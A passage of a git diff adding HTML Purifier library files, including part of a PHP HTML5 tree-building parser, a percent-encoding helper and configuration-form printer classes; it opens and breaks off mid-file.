'name' => 'option', + 'type' => HTML5::ENDTAG + )); + } + + /* If the current node is an optgroup element, then pop that node + from the stack of open elements. Otherwise, this is a parse error, + ignore the token. */ + if($this->stack[$elements_in_stack - 1] === 'optgroup') { + array_pop($this->stack); + } + + /* An end tag token whose tag name is "option" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'option') { + /* If the current node is an option element, then pop that node + from the stack of open elements. Otherwise, this is a parse error, + ignore the token. */ + if(end($this->stack)->nodeName === 'option') { + array_pop($this->stack); + } + + /* An end tag whose tag name is "select" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'select') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + // w/e + + /* Otherwise: */ + } else { + /* Pop elements from the stack of open elements until a select + element has been popped from the stack. */ + while(true) { + $current = end($this->stack)->nodeName; + array_pop($this->stack); + + if($current === 'select') { + break; + } + } + + /* Reset the insertion mode appropriately. */ + $this->resetInsertionMode(); + } + + /* A start tag whose tag name is "select" */ + } elseif($token['name'] === 'select' && + $token['type'] === HTML5::STARTTAG) { + /* Parse error. Act as if the token had been an end tag with the + tag name "select" instead. */ + $this->inSelect(array( + 'name' => 'select', + 'type' => HTML5::ENDTAG + )); + + /* An end tag whose tag name is one of: "caption", "table", "tbody", + "tfoot", "thead", "tr", "td", "th" */ + } elseif(in_array($token['name'], array('caption', 'table', 'tbody', + 'tfoot', 'thead', 'tr', 'td', 'th')) && $token['type'] === HTML5::ENDTAG) { + /* Parse error. */ + // w/e + + /* If the stack of open elements has an element in table scope with + the same tag name as that of the token, then act as if an end tag + with the tag name "select" had been seen, and reprocess the token. + Otherwise, ignore the token. */ + if($this->elementInScope($token['name'], true)) { + $this->inSelect(array( + 'name' => 'select', + 'type' => HTML5::ENDTAG + )); + + $this->mainPhase($token); + } + + /* Anything else */ + } else { + /* Parse error. Ignore the token. */ + } + } + + private function afterBody($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Process the token as it would be processed if the insertion mode + was "in body". */ + $this->inBody($token); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the first element in the stack of open + elements (the html element), with the data attribute set to the + data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + $this->stack[0]->appendChild($comment); + + /* An end tag with the tag name "html" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'html') { + /* If the parser was originally created in order to handle the + setting of an element's innerHTML attribute, this is a parse error; + ignore the token. (The element will be an html element in this + case.) (innerHTML case) */ + + /* Otherwise, switch to the trailing end phase. */ + $this->phase = self::END_PHASE; + + /* Anything else */ + } else { + /* Parse error. Set the insertion mode to "in body" and reprocess + the token. */ + $this->mode = self::IN_BODY; + return $this->inBody($token); + } + } + + private function inFrameset($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + U+000D CARRIAGE RETURN (CR), or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag with the tag name "frameset" */ + } elseif($token['name'] === 'frameset' && + $token['type'] === HTML5::STARTTAG) { + $this->insertElement($token); + + /* An end tag with the tag name "frameset" */ + } elseif($token['name'] === 'frameset' && + $token['type'] === HTML5::ENDTAG) { + /* If the current node is the root html element, then this is a + parse error; ignore the token. (innerHTML case) */ + if(end($this->stack)->nodeName === 'html') { + // Ignore + + } else { + /* Otherwise, pop the current node from the stack of open + elements. */ + array_pop($this->stack); + + /* If the parser was not originally created in order to handle + the setting of an element's innerHTML attribute (innerHTML case), + and the current node is no longer a frameset element, then change + the insertion mode to "after frameset". */ + $this->mode = self::AFTR_FRAME; + } + + /* A start tag with the tag name "frame" */ + } elseif($token['name'] === 'frame' && + $token['type'] === HTML5::STARTTAG) { + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Immediately pop the current node off the stack of open elements. */ + array_pop($this->stack); + + /* A start tag with the tag name "noframes" */ + } elseif($token['name'] === 'noframes' && + $token['type'] === HTML5::STARTTAG) { + /* Process the token as if the insertion mode had been "in body". */ + $this->inBody($token); + + /* Anything else */ + } else { + /* Parse error. Ignore the token. */ + } + } + + private function afterFrameset($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + U+000D CARRIAGE RETURN (CR), or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* An end tag with the tag name "html" */ + } elseif($token['name'] === 'html' && + $token['type'] === HTML5::ENDTAG) { + /* Switch to the trailing end phase. */ + $this->phase = self::END_PHASE; + + /* A start tag with the tag name "noframes" */ + } elseif($token['name'] === 'noframes' && + $token['type'] === HTML5::STARTTAG) { + /* Process the token as if the insertion mode had been "in body". */ + $this->inBody($token); + + /* Anything else */ + } else { + /* Parse error. Ignore the token. */ + } + } + + private function trailingEndPhase($token) { + /* After the main phase, as each token is emitted from the tokenisation + stage, it must be processed as described in this section. */ + + /* A DOCTYPE token */ + if($token['type'] === HTML5::DOCTYPE) { + // Parse error. Ignore the token. + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the Document object with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + $this->dom->appendChild($comment); + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + } elseif($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Process the token as it would be processed in the main phase. */ + $this->mainPhase($token); + + /* A character token that is not one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE. Or a start tag token. Or an end tag token. */ + } elseif(($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) || + $token['type'] === HTML5::STARTTAG || $token['type'] === HTML5::ENDTAG) { + /* Parse error. Switch back to the main phase and reprocess the + token. */ + $this->phase = self::MAIN_PHASE; + return $this->mainPhase($token); + + /* An end-of-file token */ + } elseif($token['type'] === HTML5::EOF) { + /* OMG DONE!! */ + } + } + + private function insertElement($token, $append = true, $check = false) { + // Proprietary workaround for libxml2's limitations with tag names + if ($check) { + // Slightly modified HTML5 tag-name modification, + // removing anything that's not an ASCII letter, digit, or hyphen + $token['name'] = preg_replace('/[^a-z0-9-]/i', '', $token['name']); + // Remove leading hyphens and numbers + $token['name'] = ltrim($token['name'], '-0..9'); + // In theory, this should ever be needed, but just in case + if ($token['name'] === '') $token['name'] = 'span'; // arbitrary generic choice + } + + $el = $this->dom->createElement($token['name']); + + foreach($token['attr'] as $attr) { + if(!$el->hasAttribute($attr['name'])) { + $el->setAttribute($attr['name'], $attr['value']); + } + } + + $this->appendToRealParent($el); + $this->stack[] = $el; + + return $el; + } + + private function insertText($data) { + $text = $this->dom->createTextNode($data); + $this->appendToRealParent($text); + } + + private function insertComment($data) { + $comment = $this->dom->createComment($data); + $this->appendToRealParent($comment); + } + + private function appendToRealParent($node) { + if($this->foster_parent === null) { + end($this->stack)->appendChild($node); + + } elseif($this->foster_parent !== null) { + /* If the foster parent element is the parent element of the + last table element in the stack of open elements, then the new + node must be inserted immediately before the last table element + in the stack of open elements in the foster parent element; + otherwise, the new node must be appended to the foster parent + element. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === 'table' && + $this->stack[$n]->parentNode !== null) { + $table = $this->stack[$n]; + break; + } + } + + if(isset($table) && $this->foster_parent->isSameNode($table->parentNode)) + $this->foster_parent->insertBefore($node, $table); + else + $this->foster_parent->appendChild($node); + + $this->foster_parent = null; + } + } + + private function elementInScope($el, $table = false) { + if(is_array($el)) { + foreach($el as $element) { + if($this->elementInScope($element, $table)) { + return true; + } + } + + return false; + } + + $leng = count($this->stack); + + for($n = 0; $n < $leng; $n++) { + /* 1. Initialise node to be the current node (the bottommost node of + the stack). */ + $node = $this->stack[$leng - 1 - $n]; + + if($node->tagName === $el) { + /* 2. If node is the target node, terminate in a match state. */ + return true; + + } elseif($node->tagName === 'table') { + /* 3. Otherwise, if node is a table element, terminate in a failure + state. */ + return false; + + } elseif($table === true && in_array($node->tagName, array('caption', 'td', + 'th', 'button', 'marquee', 'object'))) { + /* 4. Otherwise, if the algorithm is the "has an element in scope" + variant (rather than the "has an element in table scope" variant), + and node is one of the following, terminate in a failure state. */ + return false; + + } elseif($node === $node->ownerDocument->documentElement) { + /* 5. Otherwise, if node is an html element (root element), terminate + in a failure state. (This can only happen if the node is the topmost + node of the stack of open elements, and prevents the next step from + being invoked if there are no more elements in the stack.) */ + return false; + } + + /* Otherwise, set node to the previous entry in the stack of open + elements and return to step 2. (This will never fail, since the loop + will always terminate in the previous step if the top of the stack + is reached.) */ + } + } + + private function reconstructActiveFormattingElements() { + /* 1. If there are no entries in the list of active formatting elements, + then there is nothing to reconstruct; stop this algorithm. */ + $formatting_elements = count($this->a_formatting); + + if($formatting_elements === 0) { + return false; + } + + /* 3. Let entry be the last (most recently added) element in the list + of active formatting elements. */ + $entry = end($this->a_formatting); + + /* 2. If the last (most recently added) entry in the list of active + formatting elements is a marker, or if it is an element that is in the + stack of open elements, then there is nothing to reconstruct; stop this + algorithm. */ + if($entry === self::MARKER || in_array($entry, $this->stack, true)) { + return false; + } + + for($a = $formatting_elements - 1; $a >= 0; true) { + /* 4. If there are no entries before entry in the list of active + formatting elements, then jump to step 8. */ + if($a === 0) { + $step_seven = false; + break; + } + + /* 5. Let entry be the entry one earlier than entry in the list of + active formatting elements. */ + $a--; + $entry = $this->a_formatting[$a]; + + /* 6. If entry is neither a marker nor an element that is also in + thetack of open elements, go to step 4. */ + if($entry === self::MARKER || in_array($entry, $this->stack, true)) { + break; + } + } + + while(true) { + /* 7. Let entry be the element one later than entry in the list of + active formatting elements. */ + if(isset($step_seven) && $step_seven === true) { + $a++; + $entry = $this->a_formatting[$a]; + } + + /* 8. Perform a shallow clone of the element entry to obtain clone. */ + $clone = $entry->cloneNode(); + + /* 9. Append clone to the current node and push it onto the stack + of open elements so that it is the new current node. */ + end($this->stack)->appendChild($clone); + $this->stack[] = $clone; + + /* 10. Replace the entry for entry in the list with an entry for + clone. */ + $this->a_formatting[$a] = $clone; + + /* 11. If the entry for clone in the list of active formatting + elements is not the last entry in the list, return to step 7. */ + if(end($this->a_formatting) !== $clone) { + $step_seven = true; + } else { + break; + } + } + } + + private function clearTheActiveFormattingElementsUpToTheLastMarker() { + /* When the steps below require the UA to clear the list of active + formatting elements up to the last marker, the UA must perform the + following steps: */ + + while(true) { + /* 1. Let entry be the last (most recently added) entry in the list + of active formatting elements. */ + $entry = end($this->a_formatting); + + /* 2. Remove entry from the list of active formatting elements. */ + array_pop($this->a_formatting); + + /* 3. If entry was a marker, then stop the algorithm at this point. + The list has been cleared up to the last marker. */ + if($entry === self::MARKER) { + break; + } + } + } + + private function generateImpliedEndTags($exclude = array()) { + /* When the steps below require the UA to generate implied end tags, + then, if the current node is a dd element, a dt element, an li element, + a p element, a td element, a th element, or a tr element, the UA must + act as if an end tag with the respective tag name had been seen and + then generate implied end tags again. */ + $node = end($this->stack); + $elements = array_diff(array('dd', 'dt', 'li', 'p', 'td', 'th', 'tr'), $exclude); + + while(in_array(end($this->stack)->nodeName, $elements)) { + array_pop($this->stack); + } + } + + private function getElementCategory($node) { + $name = $node->tagName; + if(in_array($name, $this->special)) + return self::SPECIAL; + + elseif(in_array($name, $this->scoping)) + return self::SCOPING; + + elseif(in_array($name, $this->formatting)) + return self::FORMATTING; + + else + return self::PHRASING; + } + + private function clearStackToTableContext($elements) { + /* When the steps above require the UA to clear the stack back to a + table context, it means that the UA must, while the current node is not + a table element or an html element, pop elements from the stack of open + elements. If this causes any elements to be popped from the stack, then + this is a parse error. */ + while(true) { + $node = end($this->stack)->nodeName; + + if(in_array($node, $elements)) { + break; + } else { + array_pop($this->stack); + } + } + } + + private function resetInsertionMode() { + /* 1. Let last be false. */ + $last = false; + $leng = count($this->stack); + + for($n = $leng - 1; $n >= 0; $n--) { + /* 2. Let node be the last node in the stack of open elements. */ + $node = $this->stack[$n]; + + /* 3. If node is the first node in the stack of open elements, then + set last to true. If the element whose innerHTML attribute is being + set is neither a td element nor a th element, then set node to the + element whose innerHTML attribute is being set. (innerHTML case) */ + if($this->stack[0]->isSameNode($node)) { + $last = true; + } + + /* 4. If node is a select element, then switch the insertion mode to + "in select" and abort these steps. (innerHTML case) */ + if($node->nodeName === 'select') { + $this->mode = self::IN_SELECT; + break; + + /* 5. If node is a td or th element, then switch the insertion mode + to "in cell" and abort these steps. */ + } elseif($node->nodeName === 'td' || $node->nodeName === 'th') { + $this->mode = self::IN_CELL; + break; + + /* 6. If node is a tr element, then switch the insertion mode to + "in row" and abort these steps. */ + } elseif($node->nodeName === 'tr') { + $this->mode = self::IN_ROW; + break; + + /* 7. If node is a tbody, thead, or tfoot element, then switch the + insertion mode to "in table body" and abort these steps. */ + } elseif(in_array($node->nodeName, array('tbody', 'thead', 'tfoot'))) { + $this->mode = self::IN_TBODY; + break; + + /* 8. If node is a caption element, then switch the insertion mode + to "in caption" and abort these steps. */ + } elseif($node->nodeName === 'caption') { + $this->mode = self::IN_CAPTION; + break; + + /* 9. If node is a colgroup element, then switch the insertion mode + to "in column group" and abort these steps. (innerHTML case) */ + } elseif($node->nodeName === 'colgroup') { + $this->mode = self::IN_CGROUP; + break; + + /* 10. If node is a table element, then switch the insertion mode + to "in table" and abort these steps. */ + } elseif($node->nodeName === 'table') { + $this->mode = self::IN_TABLE; + break; + + /* 11. If node is a head element, then switch the insertion mode + to "in body" ("in body"! not "in head"!) and abort these steps. + (innerHTML case) */ + } elseif($node->nodeName === 'head') { + $this->mode = self::IN_BODY; + break; + + /* 12. If node is a body element, then switch the insertion mode to + "in body" and abort these steps. */ + } elseif($node->nodeName === 'body') { + $this->mode = self::IN_BODY; + break; + + /* 13. If node is a frameset element, then switch the insertion + mode to "in frameset" and abort these steps. (innerHTML case) */ + } elseif($node->nodeName === 'frameset') { + $this->mode = self::IN_FRAME; + break; + + /* 14. If node is an html element, then: if the head element + pointer is null, switch the insertion mode to "before head", + otherwise, switch the insertion mode to "after head". In either + case, abort these steps. (innerHTML case) */ + } elseif($node->nodeName === 'html') { + $this->mode = ($this->head_pointer === null) + ? self::BEFOR_HEAD + : self::AFTER_HEAD; + + break; + + /* 15. If last is true, then set the insertion mode to "in body" + and abort these steps. (innerHTML case) */ + } elseif($last) { + $this->mode = self::IN_BODY; + break; + } + } + } + + private function closeCell() { + /* If the stack of open elements has a td or th element in table scope, + then act as if an end tag token with that tag name had been seen. */ + foreach(array('td', 'th') as $cell) { + if($this->elementInScope($cell, true)) { + $this->inCell(array( + 'name' => $cell, + 'type' => HTML5::ENDTAG + )); + + break; + } + } + } + + public function save() { + return $this->dom; + } +} +?> diff --git a/lib/htmlpurifier/library/HTMLPurifier/PercentEncoder.php b/lib/htmlpurifier/library/HTMLPurifier/PercentEncoder.php new file mode 100644 index 000000000..a43c44f4c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/PercentEncoder.php @@ -0,0 +1,98 @@ +<?php + +/** + * Class that handles operations involving percent-encoding in URIs. + * + * @warning + * Be careful when reusing instances of PercentEncoder. The object + * you use for normalize() SHOULD NOT be used for encode(), or + * vice-versa. + */ +class HTMLPurifier_PercentEncoder +{ + + /** + * Reserved characters to preserve when using encode(). + */ + protected $preserve = array(); + + /** + * String of characters that should be preserved while using encode(). + */ + public function __construct($preserve = false) { + // unreserved letters, ought to const-ify + for ($i = 48; $i <= 57; $i++) $this->preserve[$i] = true; // digits + for ($i = 65; $i <= 90; $i++) $this->preserve[$i] = true; // upper-case + for ($i = 97; $i <= 122; $i++) $this->preserve[$i] = true; // lower-case + $this->preserve[45] = true; // Dash - + $this->preserve[46] = true; // Period . + $this->preserve[95] = true; // Underscore _ + $this->preserve[126]= true; // Tilde ~ + + // extra letters not to escape + if ($preserve !== false) { + for ($i = 0, $c = strlen($preserve); $i < $c; $i++) { + $this->preserve[ord($preserve[$i])] = true; + } + } + } + + /** + * Our replacement for urlencode, it encodes all non-reserved characters, + * as well as any extra characters that were instructed to be preserved. + * @note + * Assumes that the string has already been normalized, making any + * and all percent escape sequences valid. Percents will not be + * re-escaped, regardless of their status in $preserve + * @param $string String to be encoded + * @return Encoded string. + */ + public function encode($string) { + $ret = ''; + for ($i = 0, $c = strlen($string); $i < $c; $i++) { + if ($string[$i] !== '%' && !isset($this->preserve[$int = ord($string[$i])]) ) { + $ret .= '%' . sprintf('%02X', $int); + } else { + $ret .= $string[$i]; + } + } + return $ret; + } + + /** + * Fix up percent-encoding by decoding unreserved characters and normalizing. + * @warning This function is affected by $preserve, even though the + * usual desired behavior is for this not to preserve those + * characters. Be careful when reusing instances of PercentEncoder! + * @param $string String to normalize + */ + public function normalize($string) { + if ($string == '') return ''; + $parts = explode('%', $string); + $ret = array_shift($parts); + foreach ($parts as $part) { + $length = strlen($part); + if ($length < 2) { + $ret .= '%25' . $part; + continue; + } + $encoding = substr($part, 0, 2); + $text = substr($part, 2); + if (!ctype_xdigit($encoding)) { + $ret .= '%25' . $part; + continue; + } + $int = hexdec($encoding); + if (isset($this->preserve[$int])) { + $ret .= chr($int) . $text; + continue; + } + $encoding = strtoupper($encoding); + $ret .= '%' . $encoding . $text; + } + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Printer.php b/lib/htmlpurifier/library/HTMLPurifier/Printer.php new file mode 100644 index 000000000..e7eb82e83 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Printer.php @@ -0,0 +1,176 @@ +<?php + +// OUT OF DATE, NEEDS UPDATING! +// USE XMLWRITER! + +class HTMLPurifier_Printer +{ + + /** + * Instance of HTMLPurifier_Generator for HTML generation convenience funcs + */ + protected $generator; + + /** + * Instance of HTMLPurifier_Config, for easy access + */ + protected $config; + + /** + * Initialize $generator. + */ + public function __construct() { + } + + /** + * Give generator necessary configuration if possible + */ + public function prepareGenerator($config) { + $all = $config->getAll(); + $context = new HTMLPurifier_Context(); + $this->generator = new HTMLPurifier_Generator($config, $context); + } + + /** + * Main function that renders object or aspect of that object + * @note Parameters vary depending on printer + */ + // function render() {} + + /** + * Returns a start tag + * @param $tag Tag name + * @param $attr Attribute array + */ + protected function start($tag, $attr = array()) { + return $this->generator->generateFromToken( + new HTMLPurifier_Token_Start($tag, $attr ? $attr : array()) + ); + } + + /** + * Returns an end teg + * @param $tag Tag name + */ + protected function end($tag) { + return $this->generator->generateFromToken( + new HTMLPurifier_Token_End($tag) + ); + } + + /** + * Prints a complete element with content inside + * @param $tag Tag name + * @param $contents Element contents + * @param $attr Tag attributes + * @param $escape Bool whether or not to escape contents + */ + protected function element($tag, $contents, $attr = array(), $escape = true) { + return $this->start($tag, $attr) . + ($escape ? $this->escape($contents) : $contents) . + $this->end($tag); + } + + protected function elementEmpty($tag, $attr = array()) { + return $this->generator->generateFromToken( + new HTMLPurifier_Token_Empty($tag, $attr) + ); + } + + protected function text($text) { + return $this->generator->generateFromToken( + new HTMLPurifier_Token_Text($text) + ); + } + + /** + * Prints a simple key/value row in a table. + * @param $name Key + * @param $value Value + */ + protected function row($name, $value) { + if (is_bool($value)) $value = $value ? 'On' : 'Off'; + return + $this->start('tr') . "\n" . + $this->element('th', $name) . "\n" . + $this->element('td', $value) . "\n" . + $this->end('tr') + ; + } + + /** + * Escapes a string for HTML output. + * @param $string String to escape + */ + protected function escape($string) { + $string = HTMLPurifier_Encoder::cleanUTF8($string); + $string = htmlspecialchars($string, ENT_COMPAT, 'UTF-8'); + return $string; + } + + /** + * Takes a list of strings and turns them into a single list + * @param $array List of strings + * @param $polite Bool whether or not to add an end before the last + */ + protected function listify($array, $polite = false) { + if (empty($array)) return 'None'; + $ret = ''; + $i = count($array); + foreach ($array as $value) { + $i--; + $ret .= $value; + if ($i > 0 && !($polite && $i == 1)) $ret .= ', '; + if ($polite && $i == 1) $ret .= 'and '; + } + return $ret; + } + + /** + * Retrieves the class of an object without prefixes, as well as metadata + * @param $obj Object to determine class of + * @param $prefix Further prefix to remove + */ + protected function getClass($obj, $sec_prefix = '') { + static $five = null; + if ($five === null) $five = version_compare(PHP_VERSION, '5', '>='); + $prefix = 'HTMLPurifier_' . $sec_prefix; + if (!$five) $prefix = strtolower($prefix); + $class = str_replace($prefix, '', get_class($obj)); + $lclass = strtolower($class); + $class .= '('; + switch ($lclass) { + case 'enum': + $values = array(); + foreach ($obj->valid_values as $value => $bool) { + $values[] = $value; + } + $class .= implode(', ', $values); + break; + case 'css_composite': + $values = array(); + foreach ($obj->defs as $def) { + $values[] = $this->getClass($def, $sec_prefix); + } + $class .= implode(', ', $values); + break; + case 'css_multiple': + $class .= $this->getClass($obj->single, $sec_prefix) . ', '; + $class .= $obj->max; + break; + case 'css_denyelementdecorator': + $class .= $this->getClass($obj->def, $sec_prefix) . ', '; + $class .= $obj->element; + break; + case 'css_importantdecorator': + $class .= $this->getClass($obj->def, $sec_prefix); + if ($obj->allow) $class .= ', !important'; + break; + } + $class .= ')'; + return $class; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Printer/CSSDefinition.php b/lib/htmlpurifier/library/HTMLPurifier/Printer/CSSDefinition.php new file mode 100644 index 000000000..81f986590 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Printer/CSSDefinition.php @@ -0,0 +1,38 @@ +<?php + +class HTMLPurifier_Printer_CSSDefinition extends HTMLPurifier_Printer +{ + + protected $def; + + public function render($config) { + $this->def = $config->getCSSDefinition(); + $ret = ''; + + $ret .= $this->start('div', array('class' => 'HTMLPurifier_Printer')); + $ret .= $this->start('table'); + + $ret .= $this->element('caption', 'Properties ($info)'); + + $ret .= $this->start('thead'); + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Property', array('class' => 'heavy')); + $ret .= $this->element('th', 'Definition', array('class' => 'heavy', 'style' => 'width:auto;')); + $ret .= $this->end('tr'); + $ret .= $this->end('thead'); + + ksort($this->def->info); + foreach ($this->def->info as $property => $obj) { + $name = $this->getClass($obj, 'AttrDef_'); + $ret .= $this->row($property, $name); + } + + $ret .= $this->end('table'); + $ret .= $this->end('div'); + + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.css b/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.css new file mode 100644 index 000000000..3ff1a88aa --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.css @@ -0,0 +1,10 @@ + +.hp-config {} + +.hp-config tbody th {text-align:right; padding-right:0.5em;} +.hp-config thead, .hp-config .namespace {background:#3C578C; color:#FFF;} +.hp-config .namespace th {text-align:center;} +.hp-config .verbose {display:none;} +.hp-config .controls {text-align:center;} + +/* vim: et sw=4 sts=4 */ diff --git a/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.js b/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.js new file mode 100644 index 000000000..cba00c9b8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.js @@ -0,0 +1,5 @@ +function toggleWriteability(id_of_patient, checked) { + document.getElementById(id_of_patient).disabled = checked; +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.php b/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.php new file mode 100644 index 000000000..02aa65689 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Printer/ConfigForm.php @@ -0,0 +1,368 @@ +<?php + +/** + * @todo Rewrite to use Interchange objects + */ +class HTMLPurifier_Printer_ConfigForm extends HTMLPurifier_Printer +{ + + /** + * Printers for specific fields + */ + protected $fields = array(); + + /** + * Documentation URL, can have fragment tagged on end + */ + protected $docURL; + + /** + * Name of form element to stuff config in + */ + protected $name; + + /** + * Whether or not to compress directive names, clipping them off + * after a certain amount of letters. False to disable or integer letters + * before clipping. + */ + protected $compress = false; + + /** + * @param $name Form element name for directives to be stuffed into + * @param $doc_url String documentation URL, will have fragment tagged on + * @param $compress Integer max length before compressing a directive name, set to false to turn off + */ + public function __construct( + $name, $doc_url = null, $compress = false + ) { + parent::__construct(); + $this->docURL = $doc_url; + $this->name = $name; + $this->compress = $compress; + // initialize sub-printers + $this->fields[0] = new HTMLPurifier_Printer_ConfigForm_default(); + $this->fields[HTMLPurifier_VarParser::BOOL] = new HTMLPurifier_Printer_ConfigForm_bool(); + } + + /** + * Sets default column and row size for textareas in sub-printers + * @param $cols Integer columns of textarea, null to use default + * @param $rows Integer rows of textarea, null to use default + */ + public function setTextareaDimensions($cols = null, $rows = null) { + if ($cols) $this->fields['default']->cols = $cols; + if ($rows) $this->fields['default']->rows = $rows; + } + + /** + * Retrieves styling, in case it is not accessible by webserver + */ + public static function getCSS() { + return file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/Printer/ConfigForm.css'); + } + + /** + * Retrieves JavaScript, in case it is not accessible by webserver + */ + public static function getJavaScript() { + return file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/Printer/ConfigForm.js'); + } + + /** + * Returns HTML output for a configuration form + * @param $config Configuration object of current form state, or an array + * where [0] has an HTML namespace and [1] is being rendered. + * @param $allowed Optional namespace(s) and directives to restrict form to. + */ + public function render($config, $allowed = true, $render_controls = true) { + if (is_array($config) && isset($config[0])) { + $gen_config = $config[0]; + $config = $config[1]; + } else { + $gen_config = $config; + } + + $this->config = $config; + $this->genConfig = $gen_config; + $this->prepareGenerator($gen_config); + + $allowed = HTMLPurifier_Config::getAllowedDirectivesForForm($allowed, $config->def); + $all = array(); + foreach ($allowed as $key) { + list($ns, $directive) = $key; + $all[$ns][$directive] = $config->get($ns .'.'. $directive); + } + + $ret = ''; + $ret .= $this->start('table', array('class' => 'hp-config')); + $ret .= $this->start('thead'); + $ret .= $this->start('tr'); + $ret .= $this->element('th', 'Directive', array('class' => 'hp-directive')); + $ret .= $this->element('th', 'Value', array('class' => 'hp-value')); + $ret .= $this->end('tr'); + $ret .= $this->end('thead'); + foreach ($all as $ns => $directives) { + $ret .= $this->renderNamespace($ns, $directives); + } + if ($render_controls) { + $ret .= $this->start('tbody'); + $ret .= $this->start('tr'); + $ret .= $this->start('td', array('colspan' => 2, 'class' => 'controls')); + $ret .= $this->elementEmpty('input', array('type' => 'submit', 'value' => 'Submit')); + $ret .= '[<a href="?">Reset</a>]'; + $ret .= $this->end('td'); + $ret .= $this->end('tr'); + $ret .= $this->end('tbody'); + } + $ret .= $this->end('table'); + return $ret; + } + + /** + * Renders a single namespace + * @param $ns String namespace name + * @param $directive Associative array of directives to values + */ + protected function renderNamespace($ns, $directives) { + $ret = ''; + $ret .= $this->start('tbody', array('class' => 'namespace')); + $ret .= $this->start('tr'); + $ret .= $this->element('th', $ns, array('colspan' => 2)); + $ret .= $this->end('tr'); + $ret .= $this->end('tbody'); + $ret .= $this->start('tbody'); + foreach ($directives as $directive => $value) { + $ret .= $this->start('tr'); + $ret .= $this->start('th'); + if ($this->docURL) { + $url = str_replace('%s', urlencode("$ns.$directive"), $this->docURL); + $ret .= $this->start('a', array('href' => $url)); + } + $attr = array('for' => "{$this->name}:$ns.$directive"); + + // crop directive name if it's too long + if (!$this->compress || (strlen($directive) < $this->compress)) { + $directive_disp = $directive; + } else { + $directive_disp = substr($directive, 0, $this->compress - 2) . '...'; + $attr['title'] = $directive; + } + + $ret .= $this->element( + 'label', + $directive_disp, + // component printers must create an element with this id + $attr + ); + if ($this->docURL) $ret .= $this->end('a'); + $ret .= $this->end('th'); + + $ret .= $this->start('td'); + $def = $this->config->def->info["$ns.$directive"]; + if (is_int($def)) { + $allow_null = $def < 0; + $type = abs($def); + } else { + $type = $def->type; + $allow_null = isset($def->allow_null); + } + if (!isset($this->fields[$type])) $type = 0; // default + $type_obj = $this->fields[$type]; + if ($allow_null) { + $type_obj = new HTMLPurifier_Printer_ConfigForm_NullDecorator($type_obj); + } + $ret .= $type_obj->render($ns, $directive, $value, $this->name, array($this->genConfig, $this->config)); + $ret .= $this->end('td'); + $ret .= $this->end('tr'); + } + $ret .= $this->end('tbody'); + return $ret; + } + +} + +/** + * Printer decorator for directives that accept null + */ +class HTMLPurifier_Printer_ConfigForm_NullDecorator extends HTMLPurifier_Printer { + /** + * Printer being decorated + */ + protected $obj; + /** + * @param $obj Printer to 